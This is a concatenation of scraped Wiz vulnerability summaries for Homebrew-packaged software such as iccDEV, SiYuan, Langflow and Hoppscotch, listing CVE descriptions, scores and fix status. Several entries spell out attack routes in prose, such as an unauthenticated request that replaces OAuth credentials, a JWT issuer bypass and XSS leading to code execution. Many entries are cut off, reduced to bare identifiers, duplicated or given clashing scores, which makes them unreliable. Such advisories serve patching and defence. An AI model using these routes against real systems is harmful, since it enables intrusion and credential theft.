Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 20
Wiz
CVE-2025-66000 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-66000 [MEDIUM] CVE-2025-66000 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66000 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2025-58427 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-58427 [MEDIUM] CVE-2025-58427 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-58427 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-27478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-27478 [CRITICAL] CVE-2026-27478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27478 :
Homebrew vulnerability analysis and mitigation
Unity Catalog is an open, multi-modal Catalog for data and AI. In 0.4.0 and earlier, a critical authentication bypass vulnerability exists in the Unity Catalog token exchange endpoint (/api/1.0/unity-control/auth/tokens). The endpoint extracts the issuer (iss) claim from incoming JWTs and uses it to dynamically fetch the JWKS endpoint for signature validation without validating that the issuer is a trusted identity provider.
Source : NVD
## 9.1
Score
Published March 11, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS)
Wiz
CVE-2026-21684 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21684 [HIGH] CVE-2026-21684 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21684 :
Homebrew vulnerability analysis and mitigation
CIccTagSpectralViewingConditions()
Source : NVD
## 7.1
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
CVE-2026-22046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-22046 [HIGH] CVE-2026-22046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22046 :
Homebrew vulnerability analysis and mitigation
CIccProfileXml::ParseBasic()
IccXML/IccLibXML/IccProfileXml.cpp
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV expl
Wiz
CVE-2026-3383 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3383 [MEDIUM] CVE-2026-3383 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3383 :
Homebrew vulnerability analysis and mitigation
A weakness has been identified in ChaiScript up to 6.1.0. This affects the function chaiscript::Boxed_Number::go of the file include/chaiscript/dispatchkit/boxed_number.hpp. Executing a manipulation can lead to divide by zero. The attack requires local access. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability
Wiz
CVE-2026-26322 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-26322 [HIGH] CVE-2026-26322 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26322 :
Homebrew vulnerability analysis and mitigation
gatewayUrl
gatewayUrl
gatewayUrl
gatewayUrl
gateway.remote.url
Source : NVD
## 7.6
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related
Wiz
CVE-2026-33670 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33670 [CRITICAL] CVE-2026-33670 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33670 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.
Source : NVD
## 7.5
Score
Published March 26, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/siyuan-note/siyuan/kernel
siyuan
Sources
NVD
GoLang Severity CRITICAL No Fix Added at: Mar 26, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-21506 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21506 [MEDIUM] CVE-2026-21506 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21506 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to Null pointer dereference in CIccProfileXml::ParseBasic(), leading to denial of service. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at
Wiz
CVE-2026-27004 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27004 [MEDIUM] CVE-2026-27004 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27004 :
Homebrew vulnerability analysis and mitigation
sessions_list
sessions_history
sessions_send
webhookSecret
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related
Wiz
CVE-2026-30979 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-30979 [HIGH] CVE-2026-30979 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30979 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in CIccCalculatorFunc::InitSelectOp() triggered with local user interaction causing memory corruption/crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk
Wiz
CVE-2026-30987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-30987 [HIGH] CVE-2026-30987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30987 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in CIccTagNum<>::GetValues() causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs
Wiz
CVE-2026-23645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23645 [MEDIUM] CVE-2026-23645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23645 :
Homebrew vulnerability analysis and mitigation
SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2.
Source : NVD
## 5.3
Score
Published January 16, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Pro
Wiz
CVE-2026-32717 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-32717 [LOW] CVE-2026-32717 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32717 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, in multi-user mode, AnythingLLM blocks suspended users on the normal JWT-backed session path, but it does not block them on the browser extension API key path. If a user already has a valid brx-... browser extension API key, that key continues to work after suspension. As a result, a suspended user can still access browser extension endpoints, read reachable workspace metadata, and continue upload or embed operations even though normal authenticated requests are rejected.
Source : NVD
## 2.7
Score
Published March 16, 2026
Severity LOW
CNA Score 2.7
Affected Technologie
Wiz
CVE-2026-27692 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-27692 [HIGH] CVE-2026-27692 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27692 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. In versions up to and including 2.3.1.4, heap-buffer-overflow read occurs during CIccTagTextDescription::Release() when strlen() reads past a heap buffer while parsing ICC profile XML text description tags, causing a crash. Commit 29d088840b962a7cdd35993dfabc2cb35a049847 fixes the issue. No known workarounds are available.
Source : NVD
## 7.1
Score
Published February 25, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Exploitation Probability (EPSS) N/A
Affec
Wiz
CVE-2026-21491 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21491 [MEDIUM] CVE-2026-21491 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21491 :
Homebrew vulnerability analysis and mitigation
CIccTagTextDescription
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-347
Wiz
CVE-2026-34585 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-34585 [MEDIUM] CVE-2026-34585 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34585 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, a vulnerability allows crafted block attribute values to bypass server-side attribute escaping when an HTML entity is mixed with raw special characters. An attacker can embed a malicious IAL value inside a .sy document, package it as a .sy.zip, and have the victim import it through the normal Import -> SiYuan .sy.zip workflow. Once the note is opened, the malicious attribute breaks out of its original HTML context and injects an event handler, resulting in stored XSS. In the Electron desktop client, this XSS reaches remote code execution because injected JavaScript runs with access to Node/Electron APIs. This issue has been patched in version 3.6.2.
Wiz
CVE-2026-32617 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-32617 [HIGH] CVE-2026-32617 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32617 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, On default installations where no password or API key has been configured, all HTTP endpoints and the agent WebSocket lack authentication, and the server's CORS policy accepts any origin. AnythingLLM Desktop binds to 127.0.0.1 (loopback) by default. Modern browsers (Chrome, Edge, Firefox) implement Private Network Access (PNA). This explicitly blocks public websites from making requests to local IP addresses. Exploitation is only viable from within the same local network (LAN) due to browser-level blocking of public-to-private requests.
Source : NVD
## 7.5
Score
Published
Wiz
CVE-2026-1991 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-1991 [MEDIUM] CVE-2026-1991 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1991 :
Homebrew vulnerability analysis and mitigation
A vulnerability was detected in libuvc up to 0.0.7. Affected is the function uvc_scan_streaming of the file src/device.c of the component UVC Descriptor Handler. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.1
Exploitation Probability (EPSS) N/A
Affected p
Wiz
CVE-2026-34391 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-34391 [MEDIUM] CVE-2026-34391 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34391 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.1, a vulnerability in Fleet's Windows MDM command processing allows a malicious enrolled device to access MDM commands intended for other devices, potentially exposing sensitive configuration data such as WiFi credentials, VPN secrets, and certificate payloads across the entire Windows fleet. Version 4.81.1 patches the issue.
Source : NVD
## 6.6
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
f
Wiz
CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-0770 [CRITICAL] CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0770 :
Homebrew vulnerability analysis and mitigation
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Source : NVD
## 9.8
Score
Published January 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
LangFlow
Has Public
Wiz
CVE-2026-33476 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33476 [HIGH] CVE-2026-33476 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33476 :
Homebrew vulnerability analysis and mitigation
/appearance/*filepath.
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 72.5
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
siyuan
github.com/siyuan-note/siyuan/kernel
Sources
NVD
GoLang Severity HIGH No Fix Added at: Mar 21, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Sc
Wiz
CVE-2026-25583 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25583 [HIGH] CVE-2026-25583 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25583 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.3, there is a heap buffer overflow vulnerability in CIccFileIO::Read8() when processing malformed ICC profile files via unchecked fread operation. This issue has been patched in version 2.3.1.3.
Source : NVD
## 7.8
Score
Published February 4, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew S
Wiz
CVE-2026-33309 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-33309 [CRITICAL] CVE-2026-33309 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33309 :
Homebrew vulnerability analysis and mitigation
LocalStorageService
ValidatedFileName
POST /api/v2/files/
Source : NVD
## 9.9
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
Homebrew
LangFlow
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
langflow
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 20, 2026
Homebrew Severity CRITICAL Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
Wiz
CVE-2026-27168 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27168 [HIGH] CVE-2026-27168 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27168 :
Homebrew vulnerability analysis and mitigation
SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. All versions are vulnerable to Heap-based Buffer Overflow through the XWD parser's use of the bytes_per_line value. The value os read directly from the file as the read size in io->strict_read(), and is never compared to the actual size of the destination buffer. An attacker can provide an XWD file with an arbitrarily large bytes_per_line, causing a massive write operation beyond the buffer heap allocated for the image pixels. The issue did not have a fix at the time of publication.
Source : NVD
## 9.8
Score
Published February 21, 2026
Severity CRITICAL
CNA Score 8.8
Affected Technologies
Homebr
Wiz
CVE-2025-47873 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-47873 [MEDIUM] CVE-2025-47873 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-47873 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-21505 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21505 [MEDIUM] CVE-2026-21505 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21505 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a pr
Wiz
CVE-2026-24411 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24411 [HIGH] CVE-2026-24411 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24411 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in CIccTagXmlSegmentedCurve::ToXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-22255 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-22255 [HIGH] CVE-2026-22255 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22255 :
Homebrew vulnerability analysis and mitigation
CIccCLUT::Init()
IccProfLib/IccTagLut.cpp
Source : NVD
## 8.8
Score
Published January 8, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publish
Wiz
CVE-2026-21859 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-21859 [MEDIUM] CVE-2026-21859 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21859 :
Homebrew vulnerability analysis and mitigation
Mailpit is an email testing tool and API for developers. Versions 1.28.0 and below have a Server-Side Request Forgery (SSRF) vulnerability in the /proxy endpoint, allowing attackers to make requests to internal network resources. The /proxy endpoint validates http:// and https:// schemes, but it does not block internal IP addresses, enabling attackers to access internal services and APIs. This vulnerability is limited to HTTP GET requests with minimal headers. The issue is fixed in version 1.28.1.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-33179 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-33179 [MEDIUM] CVE-2026-33179 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33179 :
Homebrew vulnerability analysis and mitigation
libfuse is the reference implementation of the Linux FUSE. From version 3.18.0 to before version 3.18.2, a NULL pointer dereference and memory leak in fuse_uring_init_queue allows a local user to crash the FUSE daemon or cause resource exhaustion. When numa_alloc_local fails during io_uring queue entry setup, the code proceeds with NULL pointers. When fuse_uring_register_queue fails, NUMA allocations are leaked and the function incorrectly returns success. Only the io_uring transport is affected; the traditional /dev/fuse path is not affected. PoC confirmed with AddressSanitizer/LeakSanitizer. This issue has been patched in version 3.18.2.
Source : NVD
## 5.5
Score
Published March 20, 2026
Severity MEDIUM
CNA Scor
Wiz
CVE-2026-28215 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-28215 [CRITICAL] CVE-2026-28215 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28215 :
Homebrew vulnerability analysis and mitigation
hoppscotch is an open source API development ecosystem. Prior to version 2026.2.0, an unauthenticated attacker can overwrite the entire infrastructure configuration of a self-hosted Hoppscotch instance including OAuth provider credentials and SMTP settings by sending a single HTTP POST request with no authentication. The endpoint POST /v1/onboarding/config has no authentication guard and performs no check on whether onboarding was already completed. A successful exploit allows the attacker to replace the instance's Google/GitHub/Microsoft OAuth application credentials with their own, causing all subsequent user logins via SSO to authenticate against the attacker's OAuth app. The attacker captures OAuth tokens and email ad
Wiz
CVE-2026-24763 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-24763 [HIGH] CVE-2026-24763 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24763 :
Homebrew vulnerability analysis and mitigation
OpenClaw (formerly Clawdbot) is a personal AI assistant you run on your own devices. Prior to 2026.1.29, a command injection vulnerability existed in OpenClaw’s Docker sandbox execution mechanism due to unsafe handling of the PATH environment variable when constructing shell commands. An authenticated user able to control environment variables could influence command execution within the container context. This vulnerability is fixed in 2026.1.29.
Source : NVD
## 8.8
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Prob
Wiz
